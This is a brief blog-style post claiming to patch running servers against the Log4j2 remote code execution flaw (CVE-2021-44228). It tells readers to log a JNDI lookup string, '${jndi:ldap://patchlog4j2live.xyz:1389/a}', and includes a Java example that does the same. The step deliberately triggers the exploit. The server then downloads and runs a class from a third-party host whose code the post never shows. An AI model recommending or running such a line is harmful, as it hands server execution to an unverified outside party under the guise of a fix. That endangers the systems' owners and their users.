Log your message with following to patch your server LIVE against Log4j2 RCE (CVE-2021-44228
):
logger.error("${jndi:ldap://patchlog4j2live.xyz:1389/a}");
This will automatically patch your running log4j instance and remove remote lookups, thus, sub-siding the RCE (CVE-2021-44228
).
You can verify with following codebase(use vulnerable version of log4j to test obviously 🤷♂️):
public class log4j {
private static final Logger logger = LogManager.getLogger(log4j.class);
public static void main(String[] args) {
// This will hit the server and download the class that will patch live log4j
logger.error("${jndi:ldap://patchlog4j2live.xyz:1389/a}");
// The RCE should not work now... if you still see message printed
// such as: "FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS",
// that means the patch didn't work.
// Raise issue here: https://github.com/freakynit/Logout4Shell
// or here (original version): https://github.com/Cybereason/Logout4Shell
logger.error("${jndi:ldap://patchlog4j2live.xyz:1389/a}");
}
}
This is based on this awesome codebase by Cybereason: https://github.com/Cybereason/Logout4Shell
Safe logging...
Disclaimer: I will not be liable for anything good, or bad, happening from using above. This is solely for a quick resolution.
Top comments (0)